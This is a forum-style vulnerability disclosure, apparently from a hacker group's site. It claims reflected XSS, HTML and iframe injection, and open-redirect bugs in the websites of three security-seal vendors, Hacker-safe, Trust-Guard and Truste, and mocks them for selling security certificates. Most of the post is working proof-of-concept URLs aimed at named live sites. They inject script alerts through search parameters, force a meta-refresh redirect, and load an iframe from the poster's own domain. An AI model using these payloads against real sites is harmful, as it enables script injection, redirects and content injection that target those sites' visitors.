Nemesis Our Projects Forums Extra Controls
  RegMe



Hacker-safe vs Trust-Guard vs Truste



Hacker-safe vs Trust-Guard vs Truste
  
Multiple HTML Injection Vulnerability

hackersafe.com.tr

vulnerable page:

Code:
http://www.hackersafe.com.tr/merchants/moreinfo.htm
  
Code:
http://hackersafe.com.tr/mail.php

Code:
http://hackersafe.com.tr/mail2.php


http://img145.imageshack.us/img145/1280/89767110.jpg


Trust-Guard - XSS,Redirect and Iframe injecxtion

Code:
http://blog.trust-guard.com/?s="><script>alert(String.fromCharCode(88,83,83))</script>

Code:
http://blog.trust-guard.com/?s=">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""



http://img407.imageshack.us/img407/1584/36759027.jpg
http://img407.imageshack.us/img407/9493/22598724.jpg

Code:
https://secure.trust-guard.com/ResetPassword.php
  

The same bug on login module !

http://img29.imageshack.us/img29/3552/61673649.gif

http://img29.imageshack.us/img29/7527/50370154.gif


Truste.org - XSS & Iframe injection

Code:
http://blog.truste.org/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>


Code:
http://blog.truste.org/index.php?s="><iframe src=http://nemesis.te-home.net></iframe>


Vulnerable page on truste.org

Code:
http://www.truste.org/forms/learn_more.php


http://img366.imageshack.us/img366/8851/90848824.gif

http://img366.imageshack.us/img366/4775/15714262.gif  

How someone can sell Security Certificate when his security are 0 ?


Submitted by [-TE-]-Methodman


No Comments


You need to be logged in to be able to post comments